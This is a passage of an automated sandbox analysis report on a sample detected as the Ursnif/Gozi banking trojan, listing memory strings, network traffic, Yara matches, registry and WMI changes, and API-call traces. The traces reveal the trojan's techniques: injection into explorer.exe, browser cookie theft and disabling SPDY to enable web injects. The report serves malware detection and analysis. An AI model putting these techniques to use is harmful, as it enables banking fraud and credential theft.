Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: ~DFFF48C403F4BCBE81.TMP.4.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ~DFFF48C403F4BCBE81.TMP.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DFFF48C403F4BCBE81.TMP.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 0000001A.00000002.1000131477.000001E7AADFF000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1611307343&rver
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1611307343&rver=7.0.6730.0&am
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1611307344&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1611307343&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DFFF48C403F4BCBE81.TMP.4.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cYZkP.img?h=368&amp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFFF48C403F4BCBE81.TMP.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000024.00000000.981670591.000000000A897000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpt
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/aus-angst-vor-mutierten-viren-maskenpflicht-f%c3%bcr-z%c3%bcrch
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/auto-der-milit%c3%a4rpolizei-kollidiert-mit-tram/ar-BB1cZe9U?oc
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/die-stadt-z%c3%bcrich-schnappt-sich-einen-begehrten-kita-stando
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/feuerwehr-sperrt-teile-der-altstadt-wegen-dachlawinen/ar-BB1cXQ
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ich-habe-mehrere-kritische-man%c3%b6ver-mit-autofahrern-erlebt/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/in-schwamendingen-soll-die-gr%c3%b6sste-z%c3%bcrcher-schulanlag
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/kommentar-es-braucht-keine-staatlichen-kitas-in-der-stadt-z%c3%
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/nach-dem-flockdown-parkpl%c3%a4tze-dienen-der-stadt-z%c3%bcrich
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/nach-razzia-gegen-mutmassliche-neonazis-rechtsextreme-junge-tat
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/twitter-sperrt-accounts-von-svp-kantonsrat-claudio-schmid/ar-BB
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Source: loaddll32.exe, 00000001.00000002.1037430854.00000000008EB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FBCD7A NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FAACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FBAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FA7E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FAA027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FA45FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FA9DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB4C67 NtGetContextThread,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FA37E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FC298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB40A7 memset,NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FA7878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FAAA15 NtQuerySystemInformation,RtlNtStatusToDosError,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DC1DF4 NtWriteVirtualMemory,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB3EF4 NtQuerySystemInformation,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DC46EC NtAllocateVirtualMemory,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DBF0D0 NtReadVirtualMemory,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB1084 NtQueryInformationProcess,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA69DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DAB980 NtMapViewOfSection,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA1148 NtCreateSection,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FC1CB8 CreateProcessAsUserA,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FBED4B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FA4C03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FC3EAF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FC7188
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FAD0DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB48AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FBD057
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB8BF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FAE384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FA62FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FBDA71
Source: C:\Windows\explorer.exe	Code function: 36_2_04DAECE0
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA96D8
Source: C:\Windows\explorer.exe	Code function: 36_2_04DADF58
Source: C:\Windows\explorer.exe	Code function: 36_2_04DCA074
Source: C:\Windows\explorer.exe	Code function: 36_2_04DBB814
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA69DC
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA49C4
Source: C:\Windows\explorer.exe	Code function: 36_2_04DBD92C
Source: C:\Windows\explorer.exe	Code function: 36_2_04DADA3C
Source: C:\Windows\explorer.exe	Code function: 36_2_04DBAA28
Source: C:\Windows\explorer.exe	Code function: 36_2_04DAFCA0
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB1C0C
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA65D8
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB75D8
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB8DD0
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA5DA8
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB25A4
Source: C:\Windows\explorer.exe	Code function: 36_2_04DC7D44
Source: C:\Windows\explorer.exe	Code function: 36_2_04DCC560
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB6528
Source: C:\Windows\explorer.exe	Code function: 36_2_04DBCE90
Source: C:\Windows\explorer.exe	Code function: 36_2_04DD0614
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA1600
Source: C:\Windows\explorer.exe	Code function: 36_2_04DBA0F0
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB9850
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB782C
Source: C:\Windows\explorer.exe	Code function: 36_2_04DC19FC
Source: C:\Windows\explorer.exe	Code function: 36_2_04DCA9FC
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB99F8
Source: C:\Windows\explorer.exe	Code function: 36_2_04DAB9E8
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA596C
Source: C:\Windows\explorer.exe	Code function: 36_2_04DC6250
Source: C:\Windows\explorer.exe	Code function: 36_2_04DCEA40
Source: C:\Windows\explorer.exe	Code function: 36_2_04DD027C
